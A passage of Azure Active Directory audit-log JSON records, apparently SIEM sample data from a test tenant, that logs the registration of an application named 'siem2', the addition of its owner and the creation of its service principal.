20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": 
"18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", 
"Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "AvailableToOtherTenants", "OldValue": "[]", "NewValue": "[\r\n false\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n \"siem2\"\r\n]"}, {"NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "OldValue": "[]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": 
"nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", 
"Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "AvailableToOtherTenants", "OldValue": "[]", "NewValue": "[\r\n false\r\n]"}, {"NewValue": "[\r\n \"siem2\"\r\n]", "OldValue": "[]", "Name": "DisplayName"}, {"Name": "RequiredResourceAccess", "OldValue": "[]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n 
}\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": ""}, 
{"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n false\r\n]", "OldValue": "[]", "Name": "AvailableToOtherTenants"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n \"siem2\"\r\n]"}, {"Name": "RequiredResourceAccess", "OldValue": 
"[]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", 
"Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], 
"ObjectId": "asr@testsiem.onmicrosoft.com", "ModifiedProperties": [{"Name": "Application.ObjectID", "OldValue": "", "NewValue": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "Application.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "Application.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "targetPUID", "Value": "1003200096971F55"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"Application.ObjectID\",\"Application.DisplayName\",\"Application.AppId\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"Application\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": 
"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.7383513Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554439"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add owner to application.", "Id": "ccbe264f-f6bc-42bd-b5b6-2893ce2f465f"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": 
"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "AccountEnabled", "OldValue": "[]", "NewValue": "[\r\n true\r\n]"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n \"siem2\"\r\n]"}, {"Name": "ServicePrincipalName", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "Credential", "OldValue": "[]", "NewValue": "[\r\n {\r\n \"CredentialType\": 2,\r\n \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": 
"fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": 
"2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], 